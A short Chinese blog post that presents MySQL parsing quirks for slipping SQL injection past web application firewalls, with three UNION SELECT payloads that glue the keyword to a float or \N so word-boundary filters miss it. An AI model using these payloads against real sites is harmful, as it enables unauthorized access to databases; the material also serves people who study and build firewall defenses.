MENU

通用的关于sql注入的绕过waf的技巧(利用mysql的特性)

June 16, 2015 • Security

直接上语法

select * from users where id=8E0union select 1,2,3,4,5,6,7,8,9,0
 
select * from users where id=8.0union select 1,2,3,4,5,6,7,8,9,0
 
select * from users where id=\Nunion select 1,2,3,4,5,6,7,8,9,0

因为一般waf在防御的时候会识别union等关键词的单词边界,但是这个语句刚好可以绕过单词边界的判定。
我是fuzz出来的,了解了一下,大概是利用了语法分析中浮点击指数后语境结束,之后就直接执行后面的语句了。

另外根据官方文档我们可以看到N其实相当于NULL字符,利用这个特性可以绕过很多waf。

9.1.7 NULL Values
The NULL value means “no data.” NULL can be written in any lettercase. A synonym is \N (case sensitive).
Tags: 绕过WAF
Archives QR Code
QR Code for this page
Tipping QR Code